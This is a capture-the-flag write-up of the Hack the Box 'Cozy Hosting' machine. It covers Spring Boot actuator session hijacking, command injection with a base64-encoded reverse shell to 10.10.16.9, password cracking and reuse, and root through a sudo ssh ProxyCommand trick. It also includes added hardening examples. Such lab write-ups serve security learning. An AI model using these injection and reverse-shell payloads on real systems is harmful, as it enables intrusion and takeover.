Cozy Hosting CTF: Hack the Box

JAY BHATT
6 min read · Mar 2, 2024
Cozy Hosting

In this CTF challenge, I’ll take you through my journey to compromise the Cozy Hosting server. The server had multiple vulnerabilities that allowed me to gain access to the system and eventually achieve root privileges.

Initial Scan

I began by conducting an initial scan of the target server using Nmap:

# Initial Nmap Scan
nmap -Pn -sVC -oN initial -A -vv 10.10.11.230

The scan revealed two open ports: SSH on port 22 and HTTP on port 80. The service versions are listed under the comprehensive scan below.

Comprehensive Port Scan

To get a better understanding of the server’s exposed services, I performed a comprehensive port scan:

# Comprehensive Port Scan
nmap -Pn -p- -A -vv --min-rate 10000 -oN allPorts 10.10.11.230

This scan revealed more open ports and confirmed the previous findings:

  • SSH: OpenSSH 8.9p1 on port 22.
  • HTTP: nginx 1.18.0 on port 80.

Directory Bruteforce

Next, I decided to brute force directories using the ffuf tool to uncover hidden resources on the web server. Here's the command and some of the interesting results:

ffuf -u http://cozyhosting.htb/F -w ~/Tools/SecLists/Discovery/Web-Content/raft-small-words.txt:F

  • /index: Status 200, Size: 12706, Words: 4263
  • /login: Status 200, Size: 4431, Words: 1718
  • /logout: Status 204
  • /admin: Status 401

One of the discovered directories, /admin, hinted at potential admin functionality.

Identifying Spring Boot

During my web enumeration, I encountered a Spring Boot error page, suggesting that the server was running a Spring Boot application:

The error page text ("This application has no explicit mapping for /error") is the default Spring Boot whitelabel error page, as explained in https://stackoverflow.com/questions/31134333/this-application-has-no-explicit-mapping-for-error

To further explore this, I ran a ffuf scan specifically for Spring Boot-related endpoints:

ffuf -u http://cozyhosting.htb/F -w ~/Tools/SecLists/Discovery/Web-Content/spring-boot.txt:F

This revealed several Spring Boot-related endpoints, including /actuator, /actuator/env, and /actuator/sessions.
Full output:

ffuf -u http://cozyhosting.htb/F -w ~/Tools/SecLists/Discovery/Web-Content/spring-boot.txt:F

v1.1.0
________________________________________________

:: Method : GET
:: URL : http://cozyhosting.htb/F
:: Wordlist : F: /home/splitunknown/Tools/SecLists/Discovery/Web-Content/spring-boot.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________

actuator [Status: 200, Size: 634, Words: 1, Lines: 1]
actuator/env/lang [Status: 200, Size: 487, Words: 13, Lines: 1]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1]
actuator/env/home [Status: 200, Size: 487, Words: 13, Lines: 1]
actuator/env/path [Status: 200, Size: 487, Words: 13, Lines: 1]
actuator/sessions [Status: 200, Size: 145, Words: 1, Lines: 1]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1]
:: Progress: [112/112] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

Exploiting /actuator/sessions

One endpoint that caught my attention was /actuator/sessions. I made a GET request to it, and it returned session information:

GET /actuator/sessions HTTP/1.1
Host: cozyhosting.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

HTTP/1.1 200 
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 30 Sep 2023 13:39:07 GMT
Content-Type: application/vnd.spring-boot.actuator.v3+json
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Content-Length: 245

{"DD207626C2966663F6EA33E58EAD579E":"UNAUTHORIZED","6314C2FCB475CE6F0169A64731533F0A":"UNAUTHORIZED","4A04E0CB83A78D6F6E893886AA6EBAC9":"UNAUTHORIZED","CFAB3789DEAE511EFF43C2117ED36327":"kanderson","6A015FE07E3BA95AA001A5AA013F9B48":"kanderson"}

This exposed both authorized and unauthorized sessions. I extracted the JSESSIONID cookie for an authorized session.
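The root cause here is actuator exposure, so as an added example (not the Cozy Hosting application's own configuration, which is not shown on the page) here is an application.properties fragment with the weak setting that would produce the ffuf results above beside a hardened one; the management port and bind address are assumed values:

```properties
# Added example, not the application's own config.
# Weak: exposes every actuator endpoint (including /actuator/sessions,
# /actuator/env, /actuator/beans and /actuator/mappings) to any HTTP client,
# which is what the ffuf scan above found.
# management.endpoints.web.exposure.include=*

# Hardened: only the liveness probe is reachable over the web, and it gives
# no component details.
management.endpoints.web.exposure.include=health
management.endpoints.web.exposure.exclude=env,sessions,beans,mappings
management.endpoint.health.show-details=never

# If operators still need the other endpoints, serve them on a separate
# management port bound to loopback (assumed values) so the public nginx
# proxy on port 80 never forwards to them.
management.server.port=8081
management.server.address=127.0.0.1
```

With the exclusion in place the /actuator/sessions request shown above returns 404 instead of the session ID table, so the cookie of a logged-in user cannot be harvested this way.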

Accessing Admin Functionality

With the JSESSIONID cookie set, I gained access to the admin portal. Here, I discovered an "Add Host" functionality.

Exploiting Host Addition

During the process of adding a host, I noticed potential command injection vulnerabilities. Here are the relevant requests and responses:

  1. Adding a host with an empty username field (resulted in an error):

Request:

POST /executessh HTTP/1.1
Host: cozyhosting.htb
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://cozyhosting.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cozyhosting.htb/admin?error=Host%20key%20verification%20failed.
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=CFAB3789DEAE511EFF43C2117ED36327
Connection: close

Response:

HTTP/1.1 302 
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 30 Sep 2023 14:50:51 GMT
Content-Length: 0
Location: http://cozyhosting.htb/admin?error=Host key verification failed.
Connection: close
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY

Request:

POST /executessh HTTP/1.1
...
host=10.10.11.230&username=

Response:

Location: http://cozyhosting.htb/admin?error=usage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface] ...

  2. Attempting to bypass the username check using ${IFS} (resulted in an error about whitespaces):

Request:

POST /executessh HTTP/1.1
...
host=10.10.11.230&username=${IFS}ls${IFS}-la

Response:

Location: http://cozyhosting.htb/admin?error=Username can't contain whitespaces!

  3. Successfully bypassing username restrictions with a payload:

Request:

POST /executessh HTTP/1.1
...
host=10.10.11.230&username=;echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuOS84MCAwPiYx|${IFS}base64${IFS}-d|${IFS}bash;

This payload gave me remote code execution and a reverse shell. The base64 string in it decodes to:

sh -i >& /dev/tcp/10.10.16.9/80 0>&1
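The error messages above show that the username was only checked for whitespace before being handed to a shell, which is why ${IFS} and ; got through. As an added example (not the Cozy Hosting application's real source, which is not on the page), the following Java reproduces that weak check next to a hardened version: an allowlist for username and host, and an argv list passed to ProcessBuilder so no shell ever parses the values. The class name, method names and the ssh arguments are assumptions.

```java
import java.util.List;
import java.util.regex.Pattern;

// Added example, not the Cozy Hosting application's own code.
public final class SshHostCheck {

    // Weak check inferred from the "Username can't contain whitespaces!" error:
    // only literal whitespace is rejected, so ';' and ${IFS} pass through and are
    // later expanded by the shell that runs the concatenated command string.
    static boolean weakUsernameAccepted(String username) {
        return !username.chars().anyMatch(Character::isWhitespace);
    }

    // Hardened: allowlist of POSIX-style account names and hostname/IPv4 literals.
    // Neither pattern admits '$', ';', '|', '&', quotes or a leading '-'.
    private static final Pattern USERNAME = Pattern.compile("^[a-z_][a-z0-9_-]{0,31}$");
    private static final Pattern HOST =
            Pattern.compile("^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$");

    static boolean hardenedUsernameAccepted(String username) {
        return USERNAME.matcher(username).matches();
    }

    static boolean hardenedHostAccepted(String host) {
        return HOST.matcher(host).matches();
    }

    // Build argv directly; ProcessBuilder does not invoke /bin/sh, so metacharacters
    // in the (already validated) values are never interpreted as shell syntax.
    static List<String> buildCommand(String username, String host) {
        if (!hardenedUsernameAccepted(username) || !hardenedHostAccepted(host)) {
            throw new IllegalArgumentException("invalid username or host");
        }
        return List.of("ssh", "-o", "BatchMode=yes", "-o", "ConnectTimeout=5",
                username + "@" + host, "true");
    }

    public static void main(String[] args) {
        // The two shapes seen in the requests above (base64 body replaced by "x").
        String[] payloads = {"${IFS}ls${IFS}-la", ";echo${IFS}x|${IFS}base64${IFS}-d|${IFS}bash;"};
        for (String p : payloads) {
            System.out.printf("%-45s weak=%b hardened=%b%n",
                    p, weakUsernameAccepted(p), hardenedUsernameAccepted(p));
        }
        System.out.println(buildCommand("kanderson", "10.10.11.230"));
        // new ProcessBuilder(buildCommand(user, host)).start() would run it safely.
    }
}
```

Both payloads print weak=true hardened=false: the whitespace check alone is not a control, the allowlist plus argv execution is.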

Decompiling the JAR File

Inside the server, I found a JAR file named cloudhosting-0.0.1.jar. After transferring it to my local machine, I decompiled it using jdec. Within the decompiled code, I discovered the PostgreSQL database credentials:

spring.datasource.driver-class-name=org.postgresql.Driver
spring.datasource.url=jdbc:postgresql://<HOST>:<PORT>/<DB>
spring.datasource.username=<USER>
spring.datasource.password=<PASSWORD>

Gaining Database Access

I logged into the PostgreSQL database with the discovered credentials:

psql -U postgres -h <HOST> -p <PORT>
Password for user postgres: <PASSWORD>

I explored the available databases and found cozyhosting. Inside this database, I found a users table:

\c cozyhosting
\d users

Querying the users table, I found two users: kanderson and admin.

Cracking Admin Password

I attempted to crack the admin’s password hash using John the Ripper with the rockyou wordlist:

john-the-ripper --wordlist=/home/splitunknown/Tools/SecLists/Passwords/Leaked-Databases/rockyou.txt adminHash

After some time, the password was successfully cracked.

SSH Access as Josh

With the admin password in hand, I tried it against Josh's account over SSH, in case the password had been reused:

ssh josh@10.10.11.230

After entering the cracked password, I gained access to Josh’s account.

Privilege Escalation

I discovered that Josh had sudo privileges for running SSH as root without a password:

sudo -l

[sudo] password for josh: 
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
(root) /usr/bin/ssh *

A simple GTFOBins technique for ssh, using ProxyCommand to spawn a shell, gives root:

sudo -u root ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)

With root access, I successfully rooted the Cozy Hosting server.

In this Cozy Hosting box, we embarked on a journey that began with an initial scan and eventually led us to root the server. We combined directory brute forcing, exposed Spring Boot actuator session data, and command injection in the host-addition feature. Along the way, we uncovered database credentials in the decompiled JAR, cracked an admin password that was reused for SSH, and escalated privileges through a sudo rule for ssh. This experience highlights the importance of thorough enumeration and persistence in tackling complex penetration testing scenarios. Remember, in the world of cybersecurity, persistence pays off, and there’s always more to discover. Happy hacking!

JAY BHATT

Cyber Security Enthusiast |Top 1% on TryHackMe |CTF Player